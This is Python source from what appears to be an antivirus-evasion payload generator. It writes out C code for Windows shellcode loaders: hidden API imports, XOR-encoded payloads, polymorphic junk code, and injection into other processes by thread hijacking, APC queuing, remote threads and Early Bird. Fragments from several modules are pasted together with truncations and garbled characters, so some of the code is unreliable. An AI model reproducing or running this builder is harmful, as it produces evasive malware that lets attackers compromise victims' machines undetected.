def Win_MemLocal(ModOpt):
Ret_code= ""
if "Virtual" in ModOpt["MemAlloc"]:
if ModOpt["MemAlloc"] == "Virtual_RW/RX" or ModOpt["MemAlloc"] == "Virtual_RW/RWX":
prot="0x04"
else:
prot="0x40"
if ModOpt["DynImport"] == True:
NdcVirtualAlloc = varname_creator()
Ret_code += "FARPROC " + NdcVirtualAlloc + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"VirtualAlloc\");\n"
Ret_code += ModOpt["Lpvoid"] + " = (LPVOID) " + NdcVirtualAlloc + "(NULL," + ModOpt["Bufflen"] + ",0x00001000," + prot + ");\n"
else:
Ret_code += ModOpt["Lpvoid"] + " = VirtualAlloc(NULL," + ModOpt["Bufflen"] + ",0x00001000," + prot + ");\n"
elif ModOpt["MemAlloc"] == "Heap_RWX":
Randheaphandle = varname_creator()
if ModOpt["DynImport"] == True:
NdcHeapcreate = varname_creator()
NdcHeapalloc = varname_creator()
Ret_code += "FARPROC " + NdcHeapcreate + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"HeapCreate\");\n"
Ret_code += "FARPROC " + NdcHeapalloc + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"HeapAlloc\");\n"
Ret_code += "HANDLE " + Randheaphandle + " = (HANDLE)" + NdcHeapcreate + "(0x00040000," + ModOpt["Bufflen"] + ",0);\n"
Ret_code += ModOpt["Lpvoid"] + " = (LPVOID)" + NdcHeapalloc + "(" + Randheaphandle + ", 0x00000008," + ModOpt["Bufflen"] + ");\n"
else:
Ret_code += "HANDLE " + Randheaphandle + " = HeapCreate(0x00040000," + ModOpt["Bufflen"] + ",0);\n"
Ret_code += ModOpt["Lpvoid"] + " = HeapAlloc(" + Randheaphandle + ", 0x00000008," + ModOpt["Bufflen"] + ");\n"
return Ret_code
def Win_ChangeMemProtect(ModOpt):
Ret_code = ""
Oldprot = varname_creator()
Ret_code += "DWORD " + Oldprot + ";\n"
if "/RX" in ModOpt["MemAlloc"]:
P_cost = "0x20"
elif "/RWX" in ModOpt["MemAlloc"]:
P_cost = "0x40"
if ModOpt["ExecMethod"] == "Thread" or ModOpt["ExecMethod"] == "APC":
if ModOpt["DynImport"] == True:
NdcVirtualProtect = varname_creator()
Ret_code += "FARPROC " + NdcVirtualProtect + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"VirtualProtect\");\n"
Ret_code += NdcVirtualProtect + "(" + ModOpt["Lpvoid"] + "," + ModOpt["Bufflen"] + "," + P_cost + ",&" + Oldprot + ");\n"
else:
Ret_code += "VirtualProtect(" + ModOpt["Lpvoid"] + "," + ModOpt["Bufflen"] + "," + P_cost + ",&" + Oldprot + ");\n"
else:
if ModOpt["DynImport"] == True:
NdcVirtualProtectEx = varname_creator()
Ret_code += "FARPROC " + NdcVirtualProtectEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"VirtualProtectEx\");\n"
Ret_code += NdcVirtualProtectEx + "(" + ModOpt["ProcHandle"] + "," + ModOpt["Lpvoid2"] + "," + ModOpt["Bufflen"] + "," + P_cost + ",&" + Oldprot + ");\n"
else:
Ret_code += "VirtualProtectEx(" + ModOpt["ProcHandle"] + "," + ModOpt["Lpvoid2"] + "," + ModOpt["Bufflen"] + "," + P_cost + ",&" + Oldprot + ");\n"
return Ret_code
def Win_MemRemote(ModOpt):
Ret_code = ""
if "Virtual" in ModOpt["MemAlloc"]:
if ModOpt["MemAlloc"] == "Virtual_RWX":
prot = "0x40"
elif "RW/" in ModOpt["MemAlloc"]:
prot = "0x04"
if ModOpt["DynImport"] == True:
NdcVirtualAllocEx = varname_creator()
Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"VirtualAllocEx\");\n"
Ret_code += ModOpt["Lpvoid2"] + " = (LPVOID)" + NdcVirtualAllocEx + "(" + ModOpt["ProcHandle"] + ",NULL," + ModOpt["Bufflen"] + ",0x00001000," + prot + ");\n"
else:
Ret_code += ModOpt["Lpvoid2"] + " = VirtualAllocEx(" + ModOpt["ProcHandle"] + ",NULL," + ModOpt["Bufflen"] + ",0x00001000," + prot + ");\n"
elif ModOpt["MemAlloc"] in ["SharedSection","SS"]:
NTCS_load = varname_creator()
NTMVOS_load = varname_creator()
Buff=ModOpt["Lpvoid"]
if ModOpt["DynImport"] == False:
ModOpt["NtdllHandle"] = varname_creator()
Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
Ret_code += "SIZE_T size = 4096;\n"
Ret_code += "LARGE_INTEGER sectionSize = { size };\n"
Ret_code += "HANDLE sectionHandle = NULL;\n"
Ret_code += "LPVOID local;\n"
Ret_code += "FARPROC " + NTCS_load + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"NtCreateSection\");\n"
Ret_code += NTCS_load + "(§ionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);\n"
#Ret_code += "NtCreateSection(§ionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);\n"
Ret_code += "FARPROC " + NTMVOS_load + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"NtMapViewOfSection\");\n"
Ret_code += NTMVOS_load + "(sectionHandle, GetCurrentProcess(),&local, NULL, NULL, NULL, &size, 2, NULL, PAGE_READWRITE);\n"
Ret_code += NTMVOS_load + "(sectionHandle," + ModOpt["ProcHandle"] + ",&" + ModOpt["Lpvoid2"] + ", NULL, NULL, NULL, &size, 2, NULL, PAGE_EXECUTE_READ);\n"
Ret_code += "unsigned char * " + ModOpt["Lpvoid"] + " = local;\n"
if ModOpt["DynImport"] == True:
Ndcrtlmovemem = varname_creator()
Ret_code += "FARPROC " + Ndcrtlmovemem + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"RtlMoveMemory\");\n"
Ret_code += Ndcrtlmovemem + "(" + ModOpt["Lpvoid"] + "," + ModOpt["Buff"] + ",sizeof(" + ModOpt["Buff"] + ")-1);\n"
else:
Ret_code += "RtlMoveMemory(" + ModOpt["Lpvoid"] + "," + ModOpt["Buff"] + ",sizeof(" + ModOpt["Buff"] + ")-1);\n"
return Ret_code
def ShellcodeHelper(ModOpt):
Ret_code = ""
if ModOpt["ShellRes"] == True:
RandRes = varname_creator()
if ModOpt["DynImport"] == True:
NdcFindResource = varname_creator()
NdcLoadResource = varname_creator()
NdcSizeofResource = varname_creator()
Ret_code += "FARPROC " + NdcFindResource + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"FindResource\");\n"
Ret_code += "HRSRC " + RandRes + " = (HRSRC)" + NdcFindResource + "(NULL, MAKEINTRESOURCE(\"" + ModOpt["ResType"] + "\"), \"" + ModOpt["ResType"] + "\");\n"
Ret_code += "FARPROC " + NdcLoadResource + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"LoadResource\");\n"
#Ret_code += "DWORD shellcodeSize = SizeofResource(NULL, shellcodeResource);\n"
Ret_code += "HGLOBAL " + ModOpt["Buff"] + " = (HGLOBAL)" + NdcLoadResource + "(NULL," + RandRes + ");\n"
Ret_code += "FARPROC " + NdcSizeofResource + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"SizeofResource\");\n"
ModOpt["Bufflen"] = NdcSizeofResource + "(NULL," + RandRes + ")"
else:
Ret_code += "HRSRC " + RandRes + " = FindResource(NULL, MAKEINTRESOURCE(\"" + ModOpt["ResType"] + "\"), \"" + ModOpt["ResType"] + "\");\n"
#Ret_code += "DWORD shellcodeSize = SizeofResource(NULL, shellcodeResource);\n"
Ret_code += "HGLOBAL " + ModOpt["Buff"] + " = LoadResource(NULL," + RandRes + ");\n"
ModOpt["Bufflen"] = "SizeofResource(NULL," + RandRes + ")"
else:
Ret_code += "unsigned char " + ModOpt["Buff"] + "[] = \"" + ModOpt["Payload"] + "\";\n"
ModOpt["Bufflen"] = "sizeof(" + ModOpt["Buff"] + ")-1"
return Ret_code
# #
########################################################################################
import random, string
import sys
sys.path.append("Modules/payloads/auxiliar")
import usefull
Payload = sys.argv[1]
Filename = sys.argv[2]
Encryption = sys.argv[3]
Randbufname = usefull.varname_creator()
Payload = usefull.encoding_manager(Encryption, Payload, Randbufname)
Randgood = usefull.varname_creator()
Ndcvirtual = usefull.varname_creator()
Randmaxop = usefull.varname_creator()
Randcpt = usefull.varname_creator()
Randi = usefull.varname_creator()
Randlpv = usefull.varname_creator()
import sys
import string
from random import randint
sys.path.append("Modules/payloads/auxiliar")
from usefull import python_poly_multipath
from usefull import varname_creator
from base64 import b64encode
Pytherpreter = sys.argv[1]
Filename = sys.argv[2]
wine = sys.argv[3]
Pytherpreter = "base64.b64decode(\"" + b64encode(Pytherpreter) + "\")\n"
Randptr = varname_creator()
Randbytesnumb = str(randint(1000, 9999))
MorphEvasion1 = python_poly_multipath(randint(1, 3), 1)
MorphEvasion2 = python_poly_multipath(randint(1, 3), 2)
MorphEvasion3 = python_poly_multipath(randint(1, 3), 3)
Hollow_code = ""
if wine == "True":
Hollow_code += "import ctypes\n"
Hollow_code += "import base64,sys;\n"
Hollow_code += MorphEvasion1
Hollow_code += MorphEvasion2
Hollow_code += MorphEvasion3
sys.path.append("Modules/payloads/auxiliar")
from usefull import encoding_manager
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
Payload = sys.argv[1]
SpawnMultiProc = int(sys.argv[2])
Encryption = sys.argv[3]
Randbufname = varname_creator()
Payload = encoding_manager(Encryption, Payload, Randbufname)
NdcHeapcreate = varname_creator()
NdcHeapalloc = varname_creator()
Randmem = varname_creator()
Randlpv = varname_creator()
Randhand = varname_creator()
Randresult = varname_creator()
import random, string
import sys
import platform
sys.path.append("Modules/payloads/auxiliar")
sys.path.append("Modules/payloads/encryption")
import usefull
import Multibyte_xor
import Multibyte_xorPy3
Payload = sys.argv[1]
Filename = sys.argv[2]
Encryption = sys.argv[3]
Randbufname = usefull.varname_creator()
if Encryption == "1":
Payload = Payload.replace("buf", Randbufname)
if Encryption == "2":
Payload = Payload.splitlines()
Shellcode = ""
for line in Payload:
line = line.replace("unsigned char buf[]", "")
line = line.replace(" ", "")
line = line.replace("=", "")
line = line.replace('"', '')
line = line.replace('\n', '')
import random, string
import sys
sys.path.append("Modules/payloads/auxiliar")
sys.path.append("Modules/payloads/encryption")
import platform
import usefull
import Multibyte_xor
import Multibyte_xorPy3
Payload = sys.argv[1]
Filename = sys.argv[2]
Encryption = sys.argv[3]
Randbufname = usefull.varname_creator()
if Encryption == "1":
Payload = Payload.replace("buf",Randbufname)
if Encryption == "2":
Payload = Payload.splitlines()
Shellcode = ""
for line in Payload:
line=line.replace("unsigned char buf[]","")
line=line.replace(" ","")
line=line.replace("=","")
line=line.replace('"','')
line=line.replace('\n','')
from random import sample
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
from usefull import CheckForBackslash
Lhost = CheckForBackslash(sys.argv[1])
Lport = sys.argv[2]
SpawnMultiProc = int(sys.argv[3])
Randlpv = varname_creator()
Randpointer = varname_creator()
Randhand = varname_creator()
Randthread = varname_creator()
RandhInternet = varname_creator()
RandhConnect = varname_creator()
RandhRequest = varname_creator()
RandwFlags = varname_creator()
def Win_RemoteInjection(ModOpt):
Ret_code = ""
RandhProcess = varname_creator()
Randentry = varname_creator()
RandProcsnapshot = varname_creator()
Randlpv2 = varname_creator()
ModOpt["ProcHandle"] = RandhProcess
ModOpt["Lpvoid2"] = Randlpv2
if ModOpt["ExecMethod"] in ["ThreadExecutionHijack","TEH","ProcessInject","PI","APCSpray","APCS"]:
Ret_code += "PROCESSENTRY32 " + Randentry + ";\n"
Ret_code += Randentry + ".dwSize = sizeof(PROCESSENTRY32);\n"
if ModOpt["DynImport"] == True:
NdcTl32Snapshot = varname_creator()
NdcProcess32First = varname_creator()
NdcProcess32Next = varname_creator()
NdcOpenProcess = varname_creator()
Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"CreateToolhelp32Snapshot\");\n"
Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32First\");\n"
Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32Next\");\n"
Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenProcess\");\n"
Ret_code += "if (" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "while (" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"" + ModOpt["ProcTarget"] + "\") == 0){\n"
Ret_code += "HANDLE " + RandhProcess + " = (HANDLE)" + NdcOpenProcess + "(PROCESS_ALL_ACCESS, FALSE, " + Randentry + ".th32ProcessID);\n"
else:
Ret_code += "HANDLE " + RandProcsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
Ret_code += "if (Process32First(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "while (Process32Next(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"" + ModOpt["ProcTarget"] + "\") == 0){\n"
Ret_code += "HANDLE " + RandhProcess + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + Randentry + ".th32ProcessID);\n"
Ret_code += "if(" + RandhProcess + " != NULL){\n"
if ModOpt["ExecMethod"] in ["ThreadExecutionHijack","TEH"]:
RandThreadsnapshot = varname_creator()
RandTargetThread = varname_creator()
RandTentry = varname_creator()
RandTcontext = varname_creator()
RandThreadId = varname_creator()
Randpidvar = varname_creator()
Randinputvar = varname_creator()
RandWindowHandle = varname_creator()
Ret_code += "HANDLE " + RandThreadsnapshot + " = INVALID_HANDLE_VALUE;\n"
Ret_code += "THREADENTRY32 " + RandTentry + ";\n"
if ModOpt["DynImport"] == True:
Ret_code += RandThreadsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "( TH32CS_SNAPTHREAD, 0);\n"
else:
Ret_code += RandThreadsnapshot + " = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0);\n"
Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE ) {\n"
Ret_code += RandTentry + ".dwSize = sizeof(THREADENTRY32 );\n"
if ModOpt["DynImport"] == True:
User32 = varname_creator()
NdcThread32First = varname_creator()
NdcThread32Next = varname_creator()
NdcOpenThread = varname_creator()
NdcSuspendThread = varname_creator()
NdcGetThreadContext = varname_creator()
NdcCloseHandle = varname_creator()
Ret_code += "HANDLE " + User32 + " = GetModuleHandle(\"user32.dll\");\n" # NON NECESSARIO??????????????
Ret_code += "FARPROC " + NdcCloseHandle + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"CloseHandle\");\n"
Ret_code += "FARPROC " + NdcThread32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32Next\");\n"
Ret_code += "FARPROC " + NdcThread32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32First\");\n"
Ret_code += "FARPROC " + NdcOpenThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenThread\");\n"
Ret_code += "FARPROC " + NdcSuspendThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"SuspendThread\");\n"
Ret_code += "FARPROC " + NdcGetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"GetThreadContext\");\n"
Ret_code += "if(!" + NdcThread32First + "(" + RandThreadsnapshot + ", &" + RandTentry + " ) ){CloseHandle(" + RandThreadsnapshot + ");}\n"
Ret_code += "do{\n"
Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID ){\n"
Ret_code += "HANDLE " + RandTargetThread + " = (HANDLE)" + NdcOpenThread + "(THREAD_ALL_ACCESS ,FALSE," + RandTentry + ".th32ThreadID);\n"
Ret_code += "if(" + RandTargetThread + " != NULL){\n"
Ret_code += NdcSuspendThread + "(" + RandTargetThread + ");\n"
Ret_code += "CONTEXT " + RandTcontext + ";\n"
Ret_code += RandTcontext +".ContextFlags = CONTEXT_FULL;\n"
Ret_code += "if (" + NdcGetThreadContext + "(" + RandTargetThread + ", &" + RandTcontext + ") != 0){\n"
else:
Ret_code += "if(!Thread32First(" + RandThreadsnapshot + ", &" + RandTentry + " ) ){CloseHandle(" + RandThreadsnapshot + ");}\n"
Ret_code += "do{\n"
Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID ){\n"
Ret_code += "HANDLE " + RandTargetThread + " = OpenThread(THREAD_ALL_ACCESS ,FALSE," + RandTentry + ".th32ThreadID);\n"
Ret_code += "if(" + RandTargetThread + " != NULL){\n"
Ret_code += "SuspendThread(" + RandTargetThread + ");\n"
Ret_code += "CONTEXT " + RandTcontext + ";\n"
Ret_code += RandTcontext +".ContextFlags = CONTEXT_FULL;\n"
Ret_code += "if (GetThreadContext(" + RandTargetThread + ", &" + RandTcontext + ") != 0){\n"
if ModOpt["Arch"] == "x64":
Ret_code += RandTcontext + ".Rsp -= sizeof(unsigned int);\n"
if ModOpt["DynImport"] == True:
NdcWriteProcMem = varname_creator()
Ret_code += "FARPROC " + NdcWriteProcMem + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"WriteProcessMemory\");\n"
Ret_code += NdcWriteProcMem + "(" + RandhProcess + ", (LPVOID) " + RandTcontext + ".Rsp, (LPCVOID) &" + RandTcontext + ".Rip, sizeof(unsigned int), NULL);\n"
else:
Ret_code += "WriteProcessMemory(" + RandhProcess + ", (LPVOID) " + RandTcontext + ".Rsp, (LPCVOID) &" + RandTcontext + ".Rip, sizeof(unsigned int), NULL);\n"
else:
Ret_code += RandTcontext + ".Esp -= sizeof(unsigned int);\n"
if ModOpt["DynImport"] == True:
NdcWriteProcMem = varname_creator()
Ret_code += "FARPROC " + NdcWriteProcMem + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"WriteProcessMemory\");\n"
Ret_code += NdcWriteProcMem + "(" + RandhProcess + ", (LPVOID) " + RandTcontext + ".Esp, (LPCVOID) &" + RandTcontext + ".Eip, sizeof(unsigned int), NULL);\n"
else:
Ret_code += "WriteProcessMemory(" + RandhProcess + ", (LPVOID) " + RandTcontext + ".Esp, (LPCVOID) &" + RandTcontext + ".Eip, sizeof(unsigned int), NULL);\n"
Ret_code += "LPVOID " + Randlpv2 + ";\n"
Ret_code += Win_MemRemote(ModOpt)
if ModOpt["Decoder"] != "False":
Ret_code += ModOpt["Decoder"]
if not ModOpt["MemAlloc"] in ["SS","SharedSection"]:
if ModOpt["DynImport"] == True:
Ret_code += NdcWriteProcMem + "(" + RandhProcess + "," + Randlpv2 + ", (LPCVOID)" + ModOpt["Buff"] + "," + ModOpt["Bufflen"] + ", NULL);\n"
else:
Ret_code += "WriteProcessMemory(" + RandhProcess + "," + Randlpv2 + ", (LPCVOID)" + ModOpt["Buff"] + "," + ModOpt["Bufflen"] + ", NULL);\n"
if ModOpt["Arch"] =="x64":
Ret_code += RandTcontext + ".Rip = (DWORD_PTR)" + Randlpv2 + ";\n"
else:
Ret_code += RandTcontext + ".Eip = (DWORD_PTR)" + Randlpv2 + ";\n"
if ModOpt["DynImport"] == True:
NdcSetThreadContext = varname_creator()
Ret_code += "FARPROC " + NdcSetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"SetThreadContext\");\n"
Ret_code += "if(" + NdcSetThreadContext + "(" + RandTargetThread + ", &" + RandTcontext + ") != 0){\n"
else:
Ret_code += "if(SetThreadContext(" + RandTargetThread + ", &" + RandTcontext + ") != 0){\n"
if "RW/RX" in ModOpt["MemAlloc"] or "RW/RWX" in ModOpt["MemAlloc"]:
Ret_code += Win_ChangeMemProtect(ModOpt)
if ModOpt["DynImport"] == True:
NdcResumeThread = varname_creator()
NdcGetTopWindow = varname_creator()
Ret_code += "FARPROC " + NdcResumeThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"ResumeThread\");\n"
Ret_code += NdcResumeThread + "(" + RandTargetThread + ");\n"
Ret_code += "FARPROC " + NdcGetTopWindow + " = GetProcAddress(" + User32 + ",\"GetTopWindow\");\n"
Ret_code += "HWND " + RandWindowHandle + " = (HWND)" + NdcGetTopWindow + "(0);\n"
else:
Ret_code += "ResumeThread(" + RandTargetThread + ");\n"
Ret_code += "HWND " + RandWindowHandle + " = GetTopWindow(0);\n"
Ret_code += "while (" + RandWindowHandle + "){\n"
Ret_code += "DWORD " + Randpidvar+ ";\n"
if ModOpt["DynImport"] == True:
NdcGetWindowThreadProcId = varname_creator()
Ret_code += "FARPROC " + NdcGetWindowThreadProcId + " = GetProcAddress(" + User32 + ",\"GetWindowThreadProcessId\");\n"
Ret_code += "DWORD " + RandThreadId + " = " + NdcGetWindowThreadProcId + "(" + RandWindowHandle + ", &" + Randpidvar + ");\n"
else:
Ret_code += "DWORD " + RandThreadId + " = GetWindowThreadProcessId(" + RandWindowHandle + ", &" + Randpidvar + ");\n"
Ret_code += "if (" + Randpidvar+ " == " + Randentry + ".th32ProcessID){\n"
Ret_code += "INPUT " + Randinputvar + ";\n"
Ret_code += Randinputvar + ".type = INPUT_KEYBOARD;\n"
Ret_code += Randinputvar + ".ki.wScan = 0;\n"
Ret_code += Randinputvar + ".ki.time = 0;\n"
Ret_code += Randinputvar + ".ki.dwExtraInfo = 0;\n"
Ret_code += Randinputvar + ".ki.wVk = VK_CONTROL;\n"
Ret_code += Randinputvar + ".ki.dwFlags = 0;\n" #0 for keypress
if ModOpt["DynImport"] == True:
NdcSendInput = varname_creator()
NdcPostMessage = varname_creator()
NdcGetNextWindow = varname_creator()
Ret_code += "FARPROC " + NdcSendInput + " = GetProcAddress(" + User32 + ",\"SendInput\");\n"
Ret_code += NdcSendInput + "(1, &" + Randinputvar + ", sizeof(INPUT));\n"
Ret_code += "Sleep(" + str(random.randint(200,500)) + ");\n"
Ret_code += "FARPROC " + NdcPostMessage + " = GetProcAddress(" + User32 + ",\"PostMessage\");\n"
Ret_code += NdcPostMessage + "(" + RandWindowHandle + ", WM_KEYDOWN, 0x43, 0);\n"
Ret_code += "Sleep(" + str(random.randint(200,500)) + ");\n"
Ret_code += Randinputvar + ".ki.dwFlags = 2;\n"
Ret_code += NdcSendInput + "(1, &" + Randinputvar + ", sizeof(INPUT));}\n"
Ret_code += "FARPROC " + NdcGetNextWindow + " = GetProcAddress(" + User32 + ",\"GetNextWindow\");\n"
Ret_code += RandWindowHandle + " = (HWND)" + NdcGetNextWindow + "(" + RandWindowHandle + ", GW_HWNDNEXT);}\n"
Ret_code += NdcCloseHandle + "(" + RandThreadsnapshot + ");" + NdcCloseHandle + "(" + RandProcsnapshot + ");\n"
Ret_code += NdcCloseHandle + "(" + RandTargetThread + ");" + NdcCloseHandle + "(" + RandhProcess + ");return(0);}}}}\n"
Ret_code += "} while(" + NdcThread32Next + "(" + RandThreadsnapshot + ", &" + RandTentry + "));\n"
Ret_code += NdcCloseHandle + "(" + RandThreadsnapshot + ");\n"
Ret_code += NdcCloseHandle + "(" + RandProcsnapshot + ");}}}}}\n"
else:
Ret_code += "SendInput(1, &" + Randinputvar + ", sizeof(INPUT));\n"
Ret_code += "Sleep(" + str(random.randint(200,500)) + ");\n"
Ret_code += "PostMessage(" + RandWindowHandle + ", WM_KEYDOWN, 0x43, 0);\n"
Ret_code += "Sleep(" + str(random.randint(200,500)) + ");\n"
Ret_code += Randinputvar + ".ki.dwFlags = 2;\n"
Ret_code += "SendInput(1, &" + Randinputvar + ", sizeof(INPUT));}\n"
Ret_code += RandWindowHandle + " = GetNextWindow(" + RandWindowHandle + ", GW_HWNDNEXT);}\n"
Ret_code += "CloseHandle(" + RandThreadsnapshot + ");CloseHandle(" + RandProcsnapshot + ");\n"
Ret_code += "CloseHandle(" + RandTargetThread + ");CloseHandle(" + RandhProcess + ");return(0);}}}}\n"
Ret_code += "} while(Thread32Next(" + RandThreadsnapshot + ", &" + RandTentry + "));\n"
Ret_code += "CloseHandle(" + RandThreadsnapshot + ");\n"
Ret_code += "CloseHandle(" + RandProcsnapshot + ");}}}}}\n"
elif ModOpt["ExecMethod"] == "APCspray" or ModOpt["ExecMethod"] == "APCS":
RandThreadsnapshot = varname_creator()
RandTargetThread = varname_creator()
RandTentry = varname_creator()
RandTcontext = varname_creator()
Randresult = varname_creator()
Ret_code += "HANDLE " + RandThreadsnapshot + " = INVALID_HANDLE_VALUE;\n"
Ret_code += "THREADENTRY32 " + RandTentry + ";\n"
Ret_code += RandThreadsnapshot + " = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0);\n"
Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE ) {\n"
Ret_code += RandTentry + ".dwSize = sizeof(THREADENTRY32 );\n"
Ret_code += "if(!Thread32First(" + RandThreadsnapshot + ", &" + RandTentry + " ) ){CloseHandle(" + RandThreadsnapshot + ");}\n"
Ret_code += "LPVOID " + Randlpv2 + ";\n"
Ret_code += Win_MemRemote(ModOpt)
if ModOpt["Decoder"] != "False":
Ret_code += ModOpt["Decoder"]
Ret_code += "WriteProcessMemory(" + RandhProcess + "," + Randlpv2 + ", (LPCVOID)" + ModOpt["Buff"] + "," + ModOpt["Bufflen"] + ", NULL);\n"
Ret_code += "do{\n"
Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID ){\n"
Ret_code += "HANDLE " + RandTargetThread + " = OpenThread(THREAD_ALL_ACCESS ,FALSE," + RandTentry + ".th32ThreadID);\n"
Ret_code += "if(" + RandTargetThread + " != NULL){\n"
if "RW/RX" in ModOpt["MemAlloc"] or "RW/RWX" in ModOpt["MemAlloc"]:
Ret_code += Win_ChangeMemProtect(ModOpt)
Ret_code += "QueueUserAPC((PAPCFUNC)" + Randlpv2 + "," + RandTargetThread + ",(ULONG_PTR)NULL);}}\n"
#Ret_code += "DWORD " + Randresult + " = WaitForSingleObjectEx(" + RandTargetThread + ",-1,TRUE);\n"
#Ret_code += "CloseHandle(" + RandThreadsnapshot + ");CloseHandle(" + RandProcsnapshot + ");\n"
#Ret_code += "CloseHandle(" + RandhProcess + ");return(1);}}\n"
Ret_code += "} while(Thread32Next(" + RandThreadsnapshot + ", &" + RandTentry + "));\n"
Ret_code += "CloseHandle(" + RandThreadsnapshot + ");\n"
Ret_code += "CloseHandle(" + RandProcsnapshot + ");}}}}}\n"
elif ModOpt["ExecMethod"] == "ProcessInject" or ModOpt["ExecMethod"] == "PI":
Randhand = varname_creator()
Randthread = varname_creator()
Randresult = varname_creator()
Ret_code += "LPVOID " + Randlpv2 + ";\n"
Ret_code += Win_MemRemote(ModOpt)
if ModOpt["Decoder"] != "False" and ModOpt["MemAlloc"] not in ["SS","SharedSection"]:
Ret_code += ModOpt["Decoder"]
Ret_code += "WriteProcessMemory(" + RandhProcess + "," + Randlpv2 + ", (LPCVOID)" + ModOpt["Buff"] + "," + ModOpt["Bufflen"] + ",NULL);\n"
elif ModOpt["Decoder"] != "False" and ModOpt["MemAlloc"] in ["SS","SharedSection"]:
Ret_code += ModOpt["Decoder"]
if "RW/RX" in ModOpt["MemAlloc"] or "RW/RWX" in ModOpt["MemAlloc"]:
Ret_code += Win_ChangeMemProtect(ModOpt)
Ret_code += "HANDLE " + Randhand + " = CreateRemoteThread(" + RandhProcess + ",NULL,0," + Randlpv2 + ",NULL,0,0);\n"
Ret_code += "WaitForSingleObject(" + Randhand + ",-1);\n"
Ret_code += "CloseHandle(" + RandProcsnapshot + ");\n"
Ret_code += "CloseHandle(" + RandhProcess + ");return(0);}\n"
Ret_code += "CloseHandle(" + RandProcsnapshot + ");}}}\n"
elif ModOpt["ExecMethod"] in ["EarlyBird","EB"]:
Randsi = varname_creator()
Randpi = varname_creator()
RandThreadsnapshot = varname_creator()
RandTargetThread = varname_creator()
RandTentry = varname_creator()
RandTcontext = varname_creator()
Randresult = varname_creator()
ModOpt["ProcHandle"] = Randpi + ".hProcess"
Ret_code += "STARTUPINFOA " + Randsi + ";\n"
Ret_code += "PROCESS_INFORMATION " + Randpi + ";\n"
Ret_code += "ZeroMemory(&" + Randsi + ", sizeof(" + Randsi + "));\n"
Ret_code += Randsi + ".cb = sizeof(" + Randsi + ");\n"
Ret_code += "ZeroMemory(&" + Randpi + ", sizeof(" + Randpi + "));\n"
Ret_code += "CreateProcessA(0,\"" + ModOpt["ProcTarget"] + "\",0,0,0, CREATE_SUSPENDED,0,0,&" + Randsi + ",&" + Randpi + ");\n"
Ret_code += "LPVOID " + Randlpv2 + ";\n"
Ret_code += Win_MemRemote(ModOpt)
if ModOpt["Decoder"] != "False" and ModOpt["MemAlloc"] not in ["SS","SharedSection"]:
Ret_code += ModOpt["Decoder"]
